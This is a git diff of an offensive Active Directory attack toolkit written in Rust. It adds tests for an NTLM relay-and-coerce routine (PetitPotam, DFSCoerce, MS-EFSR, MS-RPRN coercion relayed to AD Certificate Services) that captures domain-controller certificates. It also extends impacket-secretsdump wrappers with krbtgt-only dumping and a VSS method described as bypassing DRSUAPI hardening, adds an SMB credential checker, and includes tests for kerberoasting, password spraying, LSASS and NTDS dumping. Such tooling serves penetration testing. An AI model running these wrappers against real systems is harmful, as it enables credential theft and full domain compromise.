+        let cfg = super::parse_relay_coerce_args(&args).expect("valid args should parse");
+        assert!(matches!(
+            cfg.coerce_secret,
+            Some(super::CoerceSecret::Hash(_))
+        ));
+    }
+
+    #[test]
+    fn parse_relay_coerce_args_unauth() {
+        let args = json!({
+            "ca_host": "192.168.58.10",
+            "coerce_target": "192.168.58.20",
+            "attacker_ip": "192.168.58.100"
+        });
+        let cfg = super::parse_relay_coerce_args(&args).expect("unauth args should parse");
+        assert!(cfg.coerce_user.is_none());
+        assert!(cfg.coerce_secret.is_none());
+    }
+
+    // ── Phase-progression coverage via FakeCoerceProcs ─────────────────────
+
+    use std::collections::{HashMap, HashSet};
+    use std::sync::Mutex;
+
+    #[derive(Default, Clone)]
+    struct PhaseScript {
+        relay_log_append: Vec<u8>,
+        /// (basename, bytes) — written into workdir when run_phase fires.
+        pfx_drop: Option<(String, Vec<u8>)>,
+    }
+
+    #[derive(Debug, Clone)]
+    struct RecordedPhaseCall {
+        header: String,
+        bin: String,
+        args: Vec<String>,
+    }
+
+    struct FakeState {
+        is_local_ip: bool,
+        local_ips: Vec<String>,
+        binaries_present: HashSet<String>,
+        relay_early_exit: Option<i32>,
+        relay_initial_log: Vec<u8>,
+        relay_log_path: Option<PathBuf>,
+        coerce_log_path: Option<PathBuf>,
+        phase_scripts: HashMap<String, PhaseScript>,
+        run_phase_calls: Vec<RecordedPhaseCall>,
+    }
+
+    struct FakeCoerceProcs {
+        state: Mutex<FakeState>,
+    }
+
+    impl FakeCoerceProcs {
+        fn new() -> Self {
+            Self {
+                state: Mutex::new(FakeState {
+                    is_local_ip: true,
+                    local_ips: vec!["10.0.0.1".into()],
+                    binaries_present: ["petitpotam".to_string()].into_iter().collect(),
+                    relay_early_exit: None,
+                    relay_initial_log: Vec::new(),
+                    relay_log_path: None,
+                    coerce_log_path: None,
+                    phase_scripts: HashMap::new(),
+                    run_phase_calls: Vec::new(),
+                }),
+            }
+        }
+
+        fn with_local_ip(self, allowed: bool) -> Self {
+            self.state.lock().unwrap().is_local_ip = allowed;
+            self
+        }
+
+        fn with_only_binary(self, names: &[&str]) -> Self {
+            let mut s = self.state.lock().unwrap();
+            s.binaries_present.clear();
+            for n in names {
+                s.binaries_present.insert((*n).to_string());
+            }
+            drop(s);
+            self
+        }
+
+        fn with_relay_exit(self, code: i32) -> Self {
+            self.state.lock().unwrap().relay_early_exit = Some(code);
+            self
+        }
+
+        fn with_relay_initial_log(self, bytes: &[u8]) -> Self {
+            self.state.lock().unwrap().relay_initial_log = bytes.to_vec();
+            self
+        }
+
+        fn with_phase_capture(self, header: &str, log_append: &[u8]) -> Self {
+            self.state.lock().unwrap().phase_scripts.insert(
+                header.to_string(),
+                PhaseScript {
+                    relay_log_append: log_append.to_vec(),
+                    pfx_drop: None,
+                },
+            );
+            self
+        }
+
+        fn with_phase_pfx_drop(
+            self,
+            header: &str,
+            log_append: &[u8],
+            pfx_basename: &str,
+            pfx_bytes: &[u8],
+        ) -> Self {
+            self.state.lock().unwrap().phase_scripts.insert(
+                header.to_string(),
+                PhaseScript {
+                    relay_log_append: log_append.to_vec(),
+                    pfx_drop: Some((pfx_basename.to_string(), pfx_bytes.to_vec())),
+                },
+            );
+            self
+        }
+
+        fn calls(&self) -> Vec<RecordedPhaseCall> {
+            self.state.lock().unwrap().run_phase_calls.clone()
+        }
+    }
+
+    struct FakeRelayHandle {
+        pid: u32,
+        early_exit: Option<i32>,
+    }
+
+    impl super::RelayHandle for FakeRelayHandle {
+        fn pid(&self) -> u32 {
+            self.pid
+        }
+        async fn settle_then_try_wait(&mut self, _settle: Duration) -> Option<i32> {
+            self.early_exit.take()
+        }
+        async fn kill_and_wait(&mut self, _timeout: Duration) {}
+    }
+
+    impl super::CoerceProcs for FakeCoerceProcs {
+        type Handle = FakeRelayHandle;
+
+        fn is_local_ip(&self, _ip: &str) -> bool {
+            self.state.lock().unwrap().is_local_ip
+        }
+
+        fn list_local_ips(&self) -> Vec<String> {
+            self.state.lock().unwrap().local_ips.clone()
+        }
+
+        fn which_binary(&self, name: &str) -> bool {
+            self.state.lock().unwrap().binaries_present.contains(name)
+        }
+
+        async fn cleanup_stale_listeners(&self, _workdir: &Path) {}
+
+        async fn spawn_relay(
+            &self,
+            _target_url: &str,
+            _template: &str,
+            relay_log: &Path,
+            _workdir: &Path,
+        ) -> Result<Self::Handle> {
+            let (initial_log, early_exit) = {
+                let mut s = self.state.lock().unwrap();
+                s.relay_log_path = Some(relay_log.to_path_buf());
+                (s.relay_initial_log.clone(), s.relay_early_exit)
+            };
+            tokio::fs::write(relay_log, &initial_log)
+                .await
+                .context("fake spawn_relay: write initial relay.log")?;
+            Ok(FakeRelayHandle {
+                pid: 4242,
+                early_exit,
+            })
+        }
+
+        async fn run_phase(
+            &self,
+            coerce_log: &Path,
+            header: &str,
+            bin: &str,
+            args: &[&str],
+            cwd: &Path,
+            _timeout_secs: u64,
+        ) {
+            let (script, relay_log) = {
+                let mut s = self.state.lock().unwrap();
+                s.coerce_log_path = Some(coerce_log.to_path_buf());
+                s.run_phase_calls.push(RecordedPhaseCall {
+                    header: header.to_string(),
+                    bin: bin.to_string(),
+                    args: args.iter().map(|x| (*x).to_string()).collect(),
+                });
+                let relay_log = s
+                    .relay_log_path
+                    .clone()
+                    .unwrap_or_else(|| cwd.join("relay.log"));
+                (s.phase_scripts.get(header).cloned(), relay_log)
+            };
+            // Append a phase header line to coerce.log so the path contract is
+            // observable — production appends real subprocess output here.
+            use tokio::io::AsyncWriteExt;
+            if let Ok(mut f) = tokio::fs::OpenOptions::new()
+                .create(true)
+                .append(true)
+                .open(coerce_log)
+                .await
+            {
+                let _ = f.write_all(format!("{header}\n").as_bytes()).await;
+            }
+            if let Some(script) = script {
+                if !script.relay_log_append.is_empty() {
+                    if let Ok(mut f) = tokio::fs::OpenOptions::new()
+                        .create(true)
+                        .append(true)
+                        .open(&relay_log)
+                        .await
+                    {
+                        let _ = f.write_all(&script.relay_log_append).await;
+                    }
+                }
+                if let Some((basename, bytes)) = &script.pfx_drop {
+                    let _ = tokio::fs::write(cwd.join(basename), bytes).await;
+                }
+            }
+        }
+    }
+
+    fn fast_opts() -> super::RunOptions {
+        super::RunOptions {
+            relay_settle: Duration::from_millis(0),
+            poll_interval: Duration::from_millis(2),
+            poll_phase_1: Duration::from_millis(15),
+            poll_phase_2: Duration::from_millis(15),
+            poll_phase_3: Duration::from_millis(15),
+            post_capture_settle: Duration::from_millis(0),
+            relay_kill_timeout: Duration::from_millis(15),
+            keep_workdir_on_capture: false,
+            // Tests run in parallel and would otherwise fight over the
+            // single host-wide loopback sentinel port.
+ acquire_host_lock: false, + } + } + + fn cfg_unauth() -> super::RelayCoerceConfig { + super::RelayCoerceConfig { + ca_host: "192.168.58.10".into(), + coerce_target: "192.168.58.20".into(), + attacker_ip: "192.168.58.100".into(), + coerce_user: None, + coerce_domain: String::new(), + coerce_secret: None, + template: "DomainController".into(), + } + } + + fn cfg_with_creds() -> super::RelayCoerceConfig { + super::RelayCoerceConfig { + ca_host: "192.168.58.10".into(), + coerce_target: "192.168.58.20".into(), + attacker_ip: "192.168.58.100".into(), + coerce_user: Some("alice".into()), + coerce_domain: "contoso.local".into(), + coerce_secret: Some(super::CoerceSecret::Hash( + "b8d76e56e9dac90539aff05e3ccb1755".into(), + )), + template: "DomainController".into(), + } + } + + const PHASE1: &str = "Phase 1: unauth PetitPotam"; + const PHASE2: &str = "Phase 2: DFSCoerce"; + const PHASE3_EFSR: &str = "Phase 3: MS-EFSR"; + const PHASE3_RPRN: &str = "Phase 3: MS-RPRN"; + + #[tokio::test] + async fn run_attacker_ip_not_local_bails_with_clear_error() { + let fake = FakeCoerceProcs::new().with_local_ip(false); + let err = super::run_relay_and_coerce(cfg_unauth(), &fake, fast_opts()) + .await + .unwrap_err() + .to_string(); + assert!(err.contains("not a local interface IP"), "got: {err}"); + } + + #[tokio::test] + async fn run_host_lock_contention_returns_busy_marker() { + // Hold the sentinel port ourselves to simulate another in-flight + // relay_and_coerce already running on this host. 
+ let _holder = std::net::TcpListener::bind(("127.0.0.1", super::RELAY_LOCK_PORT)) + .expect("bind sentinel port for test"); + super::USE_REAL_RELAY_LOCK_IN_TEST.with(|c| c.set(true)); + struct ResetFlag; + impl Drop for ResetFlag { + fn drop(&mut self) { + super::USE_REAL_RELAY_LOCK_IN_TEST.with(|c| c.set(false)); + } + } + let _reset = ResetFlag; + let mut opts = fast_opts(); + opts.acquire_host_lock = true; + let fake = FakeCoerceProcs::new(); + let out = super::run_relay_and_coerce(cfg_unauth(), &fake, opts) + .await + .unwrap(); + assert!(!out.success); + assert!( + out.stdout.contains("RELAY_BIND_BUSY"), + "expected RELAY_BIND_BUSY, got: {}", + out.stdout + ); + // No phases or relay spawn should fire when the lock is contended. + assert!(fake.calls().is_empty()); + } + + #[tokio::test] + async fn ntlmrelayx_to_smb_returns_busy_when_lock_held() { + let _holder = std::net::TcpListener::bind(("127.0.0.1", super::RELAY_LOCK_PORT)) + .expect("bind sentinel port for test"); + super::USE_REAL_RELAY_LOCK_IN_TEST.with(|c| c.set(true)); + struct ResetFlag; + impl Drop for ResetFlag { + fn drop(&mut self) { + super::USE_REAL_RELAY_LOCK_IN_TEST.with(|c| c.set(false)); + } + } + let _reset = ResetFlag; + let args = json!({"target_ip": "192.168.58.1"}); + let out = super::ntlmrelayx_to_smb(&args).await.unwrap(); + assert!(!out.success, "expected BUSY non-success, got success"); + assert!( + out.stdout.contains("RELAY_BIND_BUSY"), + "expected RELAY_BIND_BUSY in stdout, got: {}", + out.stdout + ); + } + + #[tokio::test] + async fn run_relay_bind_failure_returns_marker() { + let fake = FakeCoerceProcs::new() + .with_relay_exit(98) + .with_relay_initial_log(b"OSError: [Errno 98] Address already in use\n"); + let out = super::run_relay_and_coerce(cfg_unauth(), &fake, fast_opts()) + .await + .unwrap(); + assert!(!out.success); + assert_eq!(out.exit_code, Some(98)); + assert!(out.stdout.contains("RELAY_BIND_FAILED")); + assert!(out.stdout.contains("Address already in use")); + 
// No phases should run when the relay died at startup. + assert!(fake.calls().is_empty()); + } + + #[tokio::test] + async fn run_phase1_capture_skips_phase2_and_3() { + let log = b"[*] (SMB): Authenticating CONTOSO/DC01$@192.168.58.20 SUCCEED\n\ + [*] GOT CERTIFICATE! ID 1\n\ + [*] Writing PKCS#12 certificate to ./DC01.pfx\n"; + let fake = FakeCoerceProcs::new().with_phase_pfx_drop(PHASE1, log, "DC01.pfx", b"\xab\xcd"); + // Provide creds so we can verify phases 2/3 are skipped DESPITE creds. + let out = super::run_relay_and_coerce(cfg_with_creds(), &fake, fast_opts()) + .await + .unwrap(); + assert!(out.success); + assert!(out.stdout.contains("CERT_CAPTURED_VIA=unauth_petitpotam")); + assert!(out.stdout.contains("RELAYED_USER=DC01$")); + assert!(out.stdout.contains("PFX_FILE=")); + let headers: Vec<_> = fake.calls().into_iter().map(|c| c.header).collect(); + assert_eq!(headers, vec![PHASE1]); + } + + #[tokio::test] + async fn run_phase1_miss_no_creds_skips_phase2_and_3() { + let fake = FakeCoerceProcs::new(); + let out = super::run_relay_and_coerce(cfg_unauth(), &fake, fast_opts()) + .await + .unwrap(); + assert!(!out.success); + assert!(!out.stdout.contains("CERT_CAPTURED_VIA")); + let headers: Vec<_> = fake.calls().into_iter().map(|c| c.header).collect(); + assert_eq!(headers, vec![PHASE1]); + } + + #[tokio::test] + async fn run_phase2_capture_skips_phase3() { + let log = b"[*] (SMB): Authenticating CONTOSO/DC02$@192.168.58.20 SUCCEED\n\ + [*] Writing PKCS#12 certificate to ./DC02.pfx\n"; + let fake = FakeCoerceProcs::new().with_phase_pfx_drop(PHASE2, log, "DC02.pfx", b"\x01\x02"); + let out = super::run_relay_and_coerce(cfg_with_creds(), &fake, fast_opts()) + .await + .unwrap(); + assert!(out.success); + assert!(out.stdout.contains("CERT_CAPTURED_VIA=MS-DFSNM")); + let headers: Vec<_> = fake.calls().into_iter().map(|c| c.header).collect(); + assert_eq!(headers, vec![PHASE1, PHASE2]); + } + + #[tokio::test] + async fn run_phase3_efsr_miss_rprn_capture() { + let 
log = b"[*] (SMB): Authenticating CONTOSO/DC03$@192.168.58.20 SUCCEED\n\ + [*] Writing PKCS#12 certificate to ./DC03.pfx\n"; + let fake = + FakeCoerceProcs::new().with_phase_pfx_drop(PHASE3_RPRN, log, "DC03.pfx", b"\x09"); + let out = super::run_relay_and_coerce(cfg_with_creds(), &fake, fast_opts()) + .await + .unwrap(); + assert!(out.success); + assert!(out.stdout.contains("CERT_CAPTURED_VIA=MS-RPRN")); + let headers: Vec<_> = fake.calls().into_iter().map(|c| c.header).collect(); + assert_eq!(headers, vec![PHASE1, PHASE2, PHASE3_EFSR, PHASE3_RPRN]); + } + + #[tokio::test] + async fn run_ldap_base64_extraction_decodes_to_workdir() { + // Encode known plaintext so we can verify the decode path. The fake + // emits both the "Authenticating ... DC01$@..." line AND a + // "Base64 certificate of user DC01$:" block. extract_pfx_capture + // returns None (no PKCS#12 line), so the LDAP base64 path runs. + let pfx_bytes = b"PKCS12-FAKE"; + let b64 = base64::engine::general_purpose::STANDARD.encode(pfx_bytes); + let mut log = b"[*] (SMB): Authenticating CONTOSO/DC01$@192.168.58.20 SUCCEED\n\ + [*] Base64 certificate of user DC01$:\n" + .to_vec(); + log.extend_from_slice(b64.as_bytes()); + log.extend_from_slice(b"\n"); + let fake = FakeCoerceProcs::new().with_phase_capture(PHASE1, &log); + let out = super::run_relay_and_coerce(cfg_unauth(), &fake, fast_opts()) + .await + .unwrap(); + assert!(out.success, "stdout={}", out.stdout); + assert!(out.stdout.contains("RELAYED_USER=DC01$")); + // PFX_FILE should point at /DC01$.pfx — confirm the + // marker appears with that filename suffix. 
+ assert!( + out.stdout.contains("DC01$.pfx"), + "expected DC01$.pfx in stdout: {}", + out.stdout + ); + } + + #[tokio::test] + async fn run_petitpotam_binary_fallback_uses_impacket_name() { + let fake = FakeCoerceProcs::new().with_only_binary(&["impacket-petitpotam"]); + let _ = super::run_relay_and_coerce(cfg_unauth(), &fake, fast_opts()) + .await + .unwrap(); + let calls = fake.calls(); + let phase1 = calls + .iter() + .find(|c| c.header == PHASE1) + .expect("phase 1 should run"); + assert_eq!(phase1.bin, "impacket-petitpotam"); + } + + #[tokio::test] + async fn run_phase2_passes_credentials() { + // No script: phase 2 misses, but we can inspect its argv. + let fake = FakeCoerceProcs::new(); + let _ = super::run_relay_and_coerce(cfg_with_creds(), &fake, fast_opts()) + .await + .unwrap(); + let calls = fake.calls(); + let phase2 = calls + .iter() + .find(|c| c.header == PHASE2) + .expect("phase 2 should run"); + assert_eq!(phase2.bin, "dfscoerce"); + // Hash secret must surface as `-hashes :`. + let joined = phase2.args.join(" "); + assert!(joined.contains("-hashes"), "args: {joined}"); + assert!(joined.contains(":b8d76e56"), "args: {joined}"); + assert!(joined.contains("-u alice"), "args: {joined}"); + } + + #[test] + fn extract_cert_from_log_picks_last_capture() { + // Two captures in one log; we want the last one. 
+ let log = "\ +[*] Servers started, waiting for connections\n\ +[*] SMBD-Thread-1: Received connection from x\n\ +[*] Authenticating against http://ca/certsrv/ as DC1$\n\ +[*] Base64 certificate of user DC1$:\n\ +MIIBlahFirstCert==\n\ +[*] Servers started, waiting for connections\n\ +[*] Base64 certificate of user DC2$:\n\ +MIIBlahSecondCert==\n\ +[*] done\n"; + let (user, b64) = super::extract_cert_from_log(log).expect("should extract"); + assert_eq!(user, "DC2$"); + assert_eq!(b64, "MIIBlahSecondCert=="); + } + + #[test] + fn extract_cert_from_log_returns_none_without_marker() { + let log = "[*] Servers started\n[*] no auth received\n"; + assert!(super::extract_cert_from_log(log).is_none()); + } + + #[test] + fn extract_pfx_capture_picks_adcs_pair() { + // Real `--adcs` log shape captured during ntlmrelayx ADCS relay. + let log = "\ +[*] Servers started, waiting for connections\n\ +[*] SMBD-Thread-3: Received connection from 192.168.58.20, attacking target http://192.168.58.10/certsrv/certfnsh.asp\n\ +[*] (SMB): Authenticating against http://192.168.58.10/certsrv/certfnsh.asp CONTOSO/DC01$@192.168.58.20 SUCCEED [1]\n\ +[*] GOT CERTIFICATE! ID 6\n\ +[*] Writing PKCS#12 certificate to ./DC01.pfx\n\ +[*] done\n"; + let cap = super::extract_pfx_capture_from_log(log).expect("should extract"); + assert_eq!(cap.user, "DC01$"); + assert_eq!(cap.pfx_basename, "./DC01.pfx"); + } + + #[test] + fn extract_pfx_capture_falls_back_to_basename_without_user() { + let log = "[*] Writing PKCS#12 certificate to ./MEMBER1.pfx\n"; + let cap = super::extract_pfx_capture_from_log(log).expect("should extract"); + assert_eq!(cap.user, "MEMBER1"); + assert_eq!(cap.pfx_basename, "./MEMBER1.pfx"); + } + + #[test] + fn extract_pfx_capture_returns_none_without_pfx_marker() { + let log = "[*] (SMB): Authenticating against ... 
CONTOSO/DC01$@192.168.58.20 SUCCEED\n[*] auth complete"; + assert!(super::extract_pfx_capture_from_log(log).is_none()); + } + + #[test] + fn parse_relayed_user_handles_domain_user_dollar_at_ip() { + assert_eq!( + super::parse_relayed_user("blah CONTOSO/DC01$@192.168.58.20 SUCCEED"), + Some("DC01$".to_string()) + ); + assert_eq!( + super::parse_relayed_user("(SMB): Authenticating CONTOSO/jdoe@192.168.58.10"), + Some("jdoe".to_string()) + ); + } + + #[test] + fn parse_relayed_user_returns_none_when_no_user() { + // Lines with `@` but not a `domain/user` shape — URL-only, e.g. + assert_eq!(super::parse_relayed_user("[*] Connection to host"), None); + assert_eq!(super::parse_relayed_user("user@host"), None); // no slash + } + #[tokio::test] async fn ntlmrelayx_multirelay_with_targets_file() { mock::push(mock::success()); diff --git a/ares-tools/src/credential_access/kerberos.rs b/ares-tools/src/credential_access/kerberos.rs index 23272dec..2ca135b8 100644 --- a/ares-tools/src/credential_access/kerberos.rs +++ b/ares-tools/src/credential_access/kerberos.rs @@ -146,6 +146,8 @@ mod tests { use crate::args::{optional_str, required_str}; use serde_json::json; + // --- kerberoast --- + #[test] fn kerberoast_target_format() { let domain = "contoso.local"; @@ -195,6 +197,8 @@ mod tests { assert!(required_str(&args, "dc_ip").is_err()); } + // --- asrep_roast --- + #[test] fn asrep_roast_authenticated_format() { let domain = "contoso.local"; @@ -245,6 +249,8 @@ mod tests { assert_eq!(users_file, Some("/tmp/users.txt")); } + // --- DEFAULT_AD_USERNAMES --- + #[test] fn default_ad_usernames_is_non_empty() { assert!(!super::DEFAULT_AD_USERNAMES.is_empty()); @@ -260,6 +266,8 @@ mod tests { assert!(super::DEFAULT_AD_USERNAMES.contains("krbtgt")); } + // --- kerberos_user_enum_noauth --- + #[test] fn kerberos_user_enum_requires_domain() { let args = json!({"dc_ip": "192.168.58.1"}); @@ -301,6 +309,8 @@ mod tests { assert!(optional_str(&args, "users_file").is_none()); } + // --- mock 
executor tests --- + use crate::executor::mock; #[tokio::test] diff --git a/ares-tools/src/credential_access/misc.rs b/ares-tools/src/credential_access/misc.rs index 23b6d1e4..69a69dc0 100644 --- a/ares-tools/src/credential_access/misc.rs +++ b/ares-tools/src/credential_access/misc.rs @@ -50,7 +50,31 @@ pub async fn lsassy(args: &Value) -> Result { cmd.timeout_secs(120).execute().await } -/// Check for admin access on targets via `netexec smb --admin-status`. +/// Check a single credential against SMB on a target via `netexec smb`. +/// +/// Returns standard netexec output — look for `[+]` (valid cred) and +/// `(Pwn3d!)` (local admin). +pub async fn smb_login_check(args: &Value) -> Result { + let target = required_str(args, "target")?; + let username = required_str(args, "username")?; + let password = required_str(args, "password")?; + let domain = required_str(args, "domain")?; + + let cred_args = credentials::netexec_creds(Some(username), Some(password), None, Some(domain)); + + CommandBuilder::new("netexec") + .arg("smb") + .arg(target) + .args(cred_args) + .timeout_secs(60) + .execute() + .await +} + +/// Check for admin access on targets via `netexec smb`. +/// +/// netexec automatically reports `(Pwn3d!)` in its output when the +/// credential has local admin access — no extra flag needed. pub async fn domain_admin_checker(args: &Value) -> Result { let targets = required_str(args, "targets")?; let username = optional_str(args, "username"); @@ -64,7 +88,6 @@ pub async fn domain_admin_checker(args: &Value) -> Result { .arg("smb") .arg(targets) .args(cred_args) - .arg("--admin-status") .timeout_secs(120) .execute() .await @@ -140,11 +163,17 @@ pub async fn laps_dump(args: &Value) -> Result { } /// Search for user descriptions containing credentials via `ldapsearch`. +/// +/// `domain` controls the base DN (the partition being searched). +/// `bind_domain` (optional) overrides the domain in the bind DN +/// (`user@bind_domain`). 
Use when the credential belongs to a different +/// domain than the one being queried. Defaults to `domain`. pub async fn ldap_search_descriptions(args: &Value) -> Result { let target = required_str(args, "target")?; let username = required_str(args, "username")?; let password = required_str(args, "password")?; let domain = required_str(args, "domain")?; + let bind_domain = optional_str(args, "bind_domain"); let base_dn = optional_str(args, "base_dn"); // Build base DN from domain if not explicitly provided. @@ -157,7 +186,8 @@ pub async fn ldap_search_descriptions(args: &Value) -> Result { .join(","), }; - let bind_dn = format!("{username}@{domain}"); + let auth_domain = bind_domain.unwrap_or(domain); + let bind_dn = format!("{username}@{auth_domain}"); let ldap_uri = format!("ldap://{target}"); CommandBuilder::new("ldapsearch") @@ -573,6 +603,8 @@ mod tests { use crate::credentials; use serde_json::json; + // --- lsassy hash formatting --- + #[test] fn lsassy_hash_without_colon_gets_prefix() { let hash = "aabbccdd"; @@ -623,6 +655,8 @@ mod tests { assert!(optional_str(&args, "method").is_none()); } + // --- ldap_search_descriptions --- + #[test] fn base_dn_computation_from_domain() { let domain = "contoso.local"; @@ -689,6 +723,8 @@ mod tests { assert!(required_str(&args, "domain").is_ok()); } + // --- netexec_creds helper --- + #[test] fn netexec_creds_for_domain_admin_checker() { let cred_args = @@ -719,6 +755,8 @@ mod tests { assert!(required_str(&args, "targets").is_err()); } + // --- gpp_password_finder --- + #[test] fn gpp_password_finder_all_required() { let args = json!({ @@ -733,6 +771,8 @@ mod tests { assert!(required_str(&args, "domain").is_ok()); } + // --- DEFAULT_SPRAY_USERNAMES --- + #[test] fn default_spray_usernames_is_non_empty() { assert!(!super::DEFAULT_SPRAY_USERNAMES.is_empty()); @@ -749,6 +789,8 @@ mod tests { assert!(super::DEFAULT_SPRAY_USERNAMES.contains("svc_backup")); } + // --- password_spray --- + #[test] fn 
password_spray_delay_seconds_parsing() { let args = json!({ @@ -788,6 +830,8 @@ mod tests { assert!(required_str(&args, "domain").is_err()); } + // --- ntds_dit_extract --- + #[test] fn ntds_dit_extract_auth_with_password() { let (auth_string, extra_args) = credentials::impacket_auth( @@ -814,6 +858,8 @@ mod tests { assert_eq!(extra_args, vec!["-hashes", ":aabbccdd"]); } + // --- smbclient_spider --- + #[test] fn smbclient_spider_optional_pattern() { let args = json!({ @@ -855,6 +901,8 @@ mod tests { ); } + // --- check_credman_entries / check_autologon_registry --- + #[test] fn credman_requires_all_fields() { let args = json!({ @@ -881,6 +929,8 @@ mod tests { assert_eq!(cred_args[5], "contoso.local"); } + // --- username_as_password --- + #[test] fn username_as_password_requires_target() { let args = json!({"domain": "contoso.local"}); @@ -903,6 +953,8 @@ mod tests { assert_eq!(optional_str(&args, "users_file"), Some("/tmp/myusers.txt")); } + // --- mock executor tests --- + use crate::executor::mock; #[tokio::test] @@ -933,6 +985,16 @@ mod tests { assert!(super::lsassy(&args).await.is_ok()); } + #[tokio::test] + async fn smb_login_check_executes() { + mock::push(mock::success()); + let args = json!({ + "target": "192.168.58.10", "username": "localuser", + "password": "localuser", "domain": "contoso.local" + }); + assert!(super::smb_login_check(&args).await.is_ok()); + } + #[tokio::test] async fn domain_admin_checker_executes() { mock::push(mock::success()); diff --git a/ares-tools/src/credential_access/secretsdump.rs b/ares-tools/src/credential_access/secretsdump.rs index 5b2d1590..03435a47 100644 --- a/ares-tools/src/credential_access/secretsdump.rs +++ b/ares-tools/src/credential_access/secretsdump.rs @@ -18,6 +18,8 @@ pub async fn secretsdump(args: &Value) -> Result { let dc_ip = optional_str(args, "dc_ip"); let use_kerberos = optional_bool(args, "no_pass").unwrap_or(false); let ticket_path = optional_str(args, "ticket_path"); + let just_dc_user = 
optional_str(args, "just_dc_user"); + let use_vss = optional_bool(args, "use_vss").unwrap_or(false); let timeout_minutes = optional_i64(args, "timeout_minutes"); let timeout_secs = timeout_minutes.map(|m| (m * 60) as u64).unwrap_or(180); @@ -28,6 +30,7 @@ pub async fn secretsdump(args: &Value) -> Result { let mut cmd = CommandBuilder::new("impacket-secretsdump"); cmd = cmd.flag_opt("-dc-ip", dc_ip); + cmd = cmd.flag_opt("-just-dc-user", just_dc_user); if use_kerberos { cmd = cmd.arg("-k").arg("-no-pass"); @@ -38,6 +41,10 @@ pub async fn secretsdump(args: &Value) -> Result { cmd = cmd.args(extra_args); } + if use_vss { + cmd = cmd.arg("-use-vss"); + } + cmd = cmd.arg(&auth_string); cmd.timeout_secs(timeout_secs).execute().await @@ -160,6 +167,8 @@ mod tests { assert_eq!(optional_str(&args, "dc_ip"), Some("192.168.58.2")); } + // --- mock executor tests --- + use crate::executor::mock; #[tokio::test] diff --git a/ares-tools/src/credentials.rs b/ares-tools/src/credentials.rs index 8bc12d33..1f81806f 100644 --- a/ares-tools/src/credentials.rs +++ b/ares-tools/src/credentials.rs @@ -29,6 +29,15 @@ pub fn hash_args(hash: &str) -> Vec { vec!["-hashes".to_string(), h] } +/// Extract the NT hash from a hash string that may be in `LM:NT` colon form. +/// +/// `impacket-ticketer -nthash` rejects the concatenated `LM:NT` form with +/// `'Odd-length string'` because it expects a 32-char hex NT hash. This helper +/// returns the right-most colon-delimited segment, trimmed. +pub fn nt_hash_only(hash: &str) -> &str { + hash.rsplit(':').next().unwrap_or(hash).trim() +} + /// Build netexec-style credential args: `-u user -p pass -d domain` or `-u user -H hash`. 
pub fn netexec_creds( username: Option<&str>, @@ -140,6 +149,33 @@ mod tests { assert_eq!(args, vec!["-hashes", "aad3b435:aabbccdd"]); } + #[test] + fn nt_hash_only_strips_lm_half() { + assert_eq!( + nt_hash_only("aad3b435b51404eeaad3b435b51404ee:d350c5900e26d2c95f501e94cf95b078"), + "d350c5900e26d2c95f501e94cf95b078" + ); + } + + #[test] + fn nt_hash_only_passes_through_plain_nt() { + assert_eq!( + nt_hash_only("d350c5900e26d2c95f501e94cf95b078"), + "d350c5900e26d2c95f501e94cf95b078" + ); + } + + #[test] + fn nt_hash_only_trims_whitespace() { + assert_eq!(nt_hash_only(" abcd "), "abcd"); + assert_eq!(nt_hash_only("aad3b435:abcd\n"), "abcd"); + } + + #[test] + fn nt_hash_only_empty_string() { + assert_eq!(nt_hash_only(""), ""); + } + #[test] fn netexec_creds_password_auth() { let args = netexec_creds(Some("admin"), Some("P@ss"), None, Some("CONTOSO")); diff --git a/ares-tools/src/executor.rs b/ares-tools/src/executor.rs index 2cb3ff50..6ea89c77 100644 --- a/ares-tools/src/executor.rs +++ b/ares-tools/src/executor.rs @@ -15,6 +15,7 @@ pub struct CommandBuilder { env_vars: Vec<(String, String)>, timeout: Duration, stdin_data: Option, + cwd: Option, } impl CommandBuilder { @@ -25,6 +26,7 @@ impl CommandBuilder { env_vars: Vec::new(), timeout: DEFAULT_TIMEOUT, stdin_data: None, + cwd: None, } } @@ -79,6 +81,11 @@ impl CommandBuilder { self } + pub fn current_dir(mut self, dir: impl Into) -> Self { + self.cwd = Some(dir.into()); + self + } + pub async fn execute(self) -> Result { #[cfg(test)] { @@ -93,6 +100,10 @@ impl CommandBuilder { let mut cmd = Command::new(&self.program); cmd.args(&self.args); + if let Some(ref dir) = self.cwd { + cmd.current_dir(dir); + } + for (key, value) in &self.env_vars { cmd.env(key, value); } diff --git a/ares-tools/src/lateral/execution.rs b/ares-tools/src/lateral/execution.rs index 3e586d64..39383a5c 100644 --- a/ares-tools/src/lateral/execution.rs +++ b/ares-tools/src/lateral/execution.rs @@ -225,6 +225,7 @@ pub async fn xfreerdp(args: 
&Value) -> Result { cmd.arg("/cert-ignore") .arg("+auth-only") + .env("HOME", "/root") .timeout_secs(30) .execute() .await @@ -260,7 +261,9 @@ pub async fn ssh_with_password(args: &Value) -> Result { /// Dump secrets from a remote host via impacket-secretsdump with Kerberos auth. /// /// Required args: `target`, `username`, `domain`, `ticket_path` -/// Optional args: `dc_ip`, `target_ip`, `timeout_minutes` +/// Optional args: `dc_ip`, `target_ip`, `timeout_minutes`, +/// `just_dc_user` (single account, e.g. `krbtgt`), +/// `use_vss` (bool — use VSS method to bypass DRSUAPI hardening) pub async fn secretsdump_kerberos(args: &Value) -> Result { let target = required_str(args, "target")?; let username = required_str(args, "username")?; @@ -268,22 +271,28 @@ pub async fn secretsdump_kerberos(args: &Value) -> Result { let ticket_path = required_str(args, "ticket_path")?; let dc_ip = optional_str(args, "dc_ip"); let target_ip = optional_str(args, "target_ip"); + let just_dc_user = optional_str(args, "just_dc_user"); + let use_vss = crate::args::optional_bool(args, "use_vss").unwrap_or(false); let timeout_minutes = optional_i64(args, "timeout_minutes").unwrap_or(3); let timeout_secs = (timeout_minutes * 60) as u64; let target_str = format!("{domain}/{username}@{target}"); let (env_key, env_val) = credentials::kerberos_env(ticket_path); - CommandBuilder::new("impacket-secretsdump") + let mut cmd = CommandBuilder::new("impacket-secretsdump") .arg("-k") .arg("-no-pass") .arg(&target_str) .flag_opt("-dc-ip", dc_ip) .flag_opt("-target-ip", target_ip) - .env(env_key, env_val) - .timeout_secs(timeout_secs) - .execute() - .await + .flag_opt("-just-dc-user", just_dc_user) + .env(env_key, env_val); + + if use_vss { + cmd = cmd.arg("-use-vss"); + } + + cmd.timeout_secs(timeout_secs).execute().await } #[cfg(test)] @@ -292,6 +301,8 @@ mod tests { use crate::credentials; use serde_json::json; + // --- psexec --- + #[test] fn psexec_requires_target() { let args = json!({"username": 
